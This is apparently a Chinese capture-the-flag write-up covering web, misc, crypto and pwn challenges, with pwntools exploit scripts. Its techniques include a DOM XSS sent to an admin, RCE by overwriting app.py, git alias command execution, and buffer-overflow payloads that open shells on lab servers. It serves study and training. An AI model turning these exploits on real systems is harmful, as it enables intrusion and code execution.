萌新赛 WP 只写写有意思的题吧
# web
# babyjvav
https://www.tritium.work/2023/11/06/JAVA入门的坑/
# secchat
这里有一处把用户输入直接写进 innerHTML 的 DOM XSS。通过 innerHTML 插入的 `<script>` 不会执行,所以要靠事件处理器触发,比如 `<svg onload=...>` 或者 `<img src=x onerror=...>`。
注意到发起聊天时,id 会被传给这个 message 函数(也就是写进 innerHTML),所以把 XSS payload 构造进 id 发给 admin,payload 就会在 admin 的页面里执行,之后就能以 admin 的身份调用页面上的各种函数、控制 admin 的行为了。
# 大雪想考五百分
。。我觉得这个题低能的很
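// Challenge object for "大雪想考五百分": a Proxy whose `get` trap has side effects,
// so reading the same property repeatedly yields different values.
//   politics: 98 -> 99 -> 100, then stays at 100 (post-increment returns the old value).
//   english : 100 on the first read (and bumps the stored value to 101), "99" afterwards.
//   valueOf : returns target.value (500), so `daxue == 500` holds via ToPrimitive.
//   anything else falls through to the plain property (math is the string "150",
//   computer is a String object, flag is 0).
// Declared with `const`: the original assigned to an undeclared identifier, which
// throws a ReferenceError in strict mode / ES modules.
const daxue = new Proxy(
  {
    math: "150",
    computer: new String("150"),
    politics: 98,
    english: 100,
    flag: 0,
    value: 500,
  },
  {
    get(target, prop, receiver) {
      if (prop === 'politics') {
        // post-increment: hands back the old value and mutates the target
        return target.politics !== 100 ? target.politics++ : target.politics;
      }
      if (prop === "valueOf") {
        return function () {
          return target.value;
        };
      }
      if (prop === 'english') {
        return target.english !== 100 ? "99" : target.english++;
      }
      return Reflect.get(target, prop, receiver);
    },
  }
);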
# 我新学的 flask
利用任意文件上传(路径可控)覆盖 /src/app.py,往里加一个执行命令的恶意路由就能 RCE。前提是应用会重新加载改动后的源码(比如开了 debug 自动重载,或者进程被重启),否则覆盖后的文件不会立刻生效。
# misc
# 大雪树锯结构
这是打 git-shell 的题,考察一个很少用的点:
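# Alias values starting with `!` are handed to the shell, so a one-shot
# `-c alias.NAME='!cmd'` turns any place that only lets you run git into
# arbitrary command execution. (The stray trailing `|` from the page layout
# has been dropped: it left the shell waiting for the other side of a pipe.)
git -c alias.test='!/readflag' test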
alias 的值以 `!` 开头时 git 会把它交给 shell 执行,所以即使只能跑 git 命令,也能通过 `-c alias.xxx='!cmd'` 执行任意外部命令。
# 内存取证
用 Volatility 列出进程,找到可疑的 backdoor.exe 并把它 dump 出来,直接读它的内容就行。
# 3G 之前是什么
本意是考信息论(用提问缩小范围),但在 CTF 环境下有一条歪路:每次都直接猜全 1,猜错就重连重试。
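# "3G 之前是什么": keep reconnecting and guessing all-ones until the chest
# layout happens to match.  The original script never left the outer loop once
# a round succeeded and re-opened sockets without closing the previous one;
# the success path now breaks out and every connection is closed.
HOST = "172.20.14.117"
PORT = 53001
ATTEMPTS_PER_CONNECTION = 15
SUCCESS_MARKER = "You've found all the treas"


def _found_all(res: str) -> bool:
    """Return True when a server reply line announces that all chests were found."""
    return SUCCESS_MARKER in res


def play_rounds(r, attempts: int = ATTEMPTS_PER_CONNECTION):
    """Play up to ``attempts`` rounds on an open tube, guessing all-ones each time.

    ``r`` is any object with pwntools-style ``recvuntil``/``sendline``/``recvline``.
    Returns the winning reply line (decoded str), or None if no round succeeded.
    """
    for _ in range(attempts):
        print(r.recvuntil(b"Ask Shannon:\n[-] "))
        r.sendline(b"1")  # throwaway question; the answer is never used
        r.recvuntil(b"Now open the chests:\n[-] ")
        # 7 chests, each 0/1 -> 2^7 = 128 layouts; all-ones is one of them
        r.sendline(b"1 1 1 1 1 1 1")
        res = r.recvline().decode()
        if _found_all(res):
            return res
        print("next")
    return None


def main() -> None:
    """Reconnect until one connection wins, closing the socket each time."""
    from pwn import remote  # local import keeps the pure helpers importable without pwntools

    while True:
        r = remote(HOST, PORT)
        try:
            res = play_rounds(r)
        finally:
            r.close()  # release the socket even if the server drops mid-round
        if res is not None:
            print(res)
            break


if __name__ == "__main__":
    main()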
7 个箱子每个 0/1,一共只有 2^7 = 128 种情况,所以多重连刷几次,很快就会碰到全 1 的那一轮。
# crypto
# hard_pow
哈希长度扩展攻击(length extension attack)。hashpumpy 装不上,用了一个平替:
https://github.com/shellfeel/hash-ext-attack/tree/master
# easy_pow
用 bruteHASH 直接跑出来就行,不用自己写脚本。
https://github.com/playGitboy/bruteHASH
# easy_dhke
题目把 p、g 和双方的私钥都泄露了,直接把它们搬过来算出共享密钥,缝进 pwntools 的交互脚本里。
from Crypto.Util.number import * # type: ignore | |
from Crypto.Cipher import AES | |
from Crypto.Util.Padding import pad,unpad | |
import string | |
import random | |
import os | |
from pwn import * | |
# --- Leaked Diffie-Hellman parameters, copied straight from the challenge ---
# NOTE(security): everything here is weak by design. p is 128 bits and both
# private exponents are below 2^16, so the shared secret could be brute-forced
# even if the private keys had not been handed out.
p = 327824197795087630552811243153730025469  # modulus (stated by the challenge to be prime)
g = 5  # generator
alice = 22751  # Alice's private exponent
bob = 39494  # Bob's private exponent

# Bob's public value g^bob mod p (capitalised to tell it apart from the exponent).
Bob = pow(g, bob, p)

# Shared secret from Alice's side: Bob^alice mod p == g^(alice*bob) mod p.
# long_to_bytes() emits the minimal big-endian encoding, so the AES key is
# 16 bytes only when the secret is >= 2^120; a smaller secret (roughly 1 in 250
# for this p) would give 15 bytes and AES.new() would reject it.
shared_secret = pow(Bob, alice, p)
key = long_to_bytes(shared_secret)
def encrypt(plain_text: bytes, key: bytes) -> bytes:
    """AES-ECB encrypt ``plain_text`` under ``key`` with PKCS#7 padding.

    ECB is what the challenge server speaks, so it is mirrored here; it is
    deterministic and leaks equal blocks, so never reuse it outside this exploit.
    ``key`` must be 16/24/32 bytes or ``AES.new`` raises ``ValueError``.
    """
    padded = pad(plain_text, AES.block_size)
    return AES.new(key, AES.MODE_ECB).encrypt(padded)
def decrypt(encrypt_text: bytes, key: bytes) -> bytes:
    """AES-ECB decrypt ``encrypt_text`` under ``key`` and strip PKCS#7 padding.

    Mirrors the challenge server. Raises ``ValueError`` when the input length is
    not a multiple of 16 bytes, the padding is invalid, or the key length is
    not 16/24/32 bytes.
    """
    cipher_obj = AES.new(key, AES.MODE_ECB)
    return unpad(cipher_obj.decrypt(encrypt_text), AES.block_size)
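def main() -> None:
    """Decrypt Alice's message for the server, then hand it our own ciphertext.

    The tube is used as a context manager so the socket is closed even when
    ``decrypt``/``unpad`` raises on unexpected input (the original left it open).
    """
    with remote("172.20.14.117", 40766) as r:
        r.recvuntil(b"[+] Alice said :\n")
        # NOTE(review): this assumes the ciphertext arrives raw and newline-terminated.
        # A 0x0a byte inside raw AES output would truncate the read; if the server
        # hex/base64-encodes it instead, decode here first -- confirm against the server.
        cipher = r.recvuntil(b"\n")[:-1]
        print(cipher)
        message = decrypt(cipher, key)
        print(message)
        r.recvuntil(b"[+] Now tell me what are they talking about:")
        r.sendline(message)
        r.recvuntil(b"[+] Tell me the cipher:")
        # send() without a newline, as in the original run; presumably the server
        # reads a fixed number of raw bytes -- verify if it hangs here.
        r.send(encrypt(b"HackedBy0xfa", key))
        print(r.recvall())


if __name__ == "__main__":
    main()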
# easy_rsa
这题的 n 很弱,直接丢到 factordb 上就能查到分解,拿到 p、q 之后算出 d 解密即可。
# leak_d
你都知道 d 了 直接解密不就行了
脚本好像被我删了
# pwn
# right
这题是自己研究出来的,就是 ctf-wiki 上最简单的 ret2text。
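import struct

# "right": textbook ret2text. The buffer sits at rbp-0x20, so 0x20 bytes reach
# the saved rbp, 8 more cover it, and byte 0x28 onward is the return address.
# Payload construction is split from the network I/O so it can be unit-tested,
# and the commented-out debugging lines of the original are gone.
HOST = "172.20.14.117"
PORT = 28202
SYSTEM_CALL_ADDR = 0x40115A  # address of the `call system` line inside the binary
PAD_LEN = 0x28


def build_payload(ret_addr: int, pad_len: int = PAD_LEN) -> bytes:
    """Return ``pad_len`` filler bytes followed by ``ret_addr`` as a little-endian u64.

    Equivalent to pwntools' ``flat([b'a' * pad_len, ret_addr])`` under an amd64
    context, but needs only the standard library.
    """
    return b"a" * pad_len + struct.pack("<Q", ret_addr)


def main() -> None:
    """Connect, wait for the prompt, overwrite the return address, drop to a shell."""
    from pwn import context, remote  # local import: build_payload stays importable without pwntools

    context(os="linux", arch="amd64", log_level="debug")
    r = remote(HOST, PORT)
    r.recvuntil(b"so please tell me what you want to tell me\n")
    # NOTE(review): returning into the middle of a function skips its prologue, so the
    # stack alignment at the system call depends on the caller's frame; if system
    # faults on a movaps, go through a `ret` gadget first or retarget the address.
    r.sendline(build_payload(SYSTEM_CALL_ADDR))
    r.interactive()


if __name__ == "__main__":
    main()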
addr 是调用 system 那一行的地址;缓冲区在 rbp-0x20,填 0x20 字节到 rbp、再 8 字节盖掉保存的 rbp,第 0x28 字节起就是返回地址,所以 payload 是 0x28 个填充加 addr。
# onepiece
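import struct

# "onepiece": blind pwn. The binary was not analysed, so instead of computing the
# exact offset the return address is sprayed: 0x100 filler bytes, then the target
# repeated 0x100 times. Payload construction is split from the I/O so it can be
# unit-tested without pwntools.
HOST = "172.20.14.117"
PORT = 61768
TARGET_ADDR = 0x40119E
PAD_LEN = 0x100
SLED_COUNT = 0x100


def build_payload(target: int, pad_len: int = PAD_LEN, sled_count: int = SLED_COUNT) -> bytes:
    """Return ``pad_len`` filler bytes followed by ``target`` repeated ``sled_count`` times.

    Equivalent to pwntools' ``b"a" * pad_len + p64(target) * sled_count``.
    Presumably the saved return address lands somewhere in the repeated region at an
    8-byte-aligned position relative to the buffer start -- that is what the spray
    relies on, and it is not verified here.
    """
    return b"a" * pad_len + struct.pack("<Q", target) * sled_count


def main() -> None:
    """Connect, fire the sprayed payload, drop to an interactive shell."""
    from pwn import remote  # local import: build_payload stays importable without pwntools

    io = remote(HOST, PORT)
    io.sendline(build_payload(TARGET_ADDR))  # no prompt is awaited, as in the original run
    io.interactive()


if __name__ == "__main__":
    main()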
这个是瞎打出来的:blind pwn 我看不明白,就在 0x100 个填充字节后面铺了 0x100 个 addr,靠这片"地址雪橇"盖到返回地址。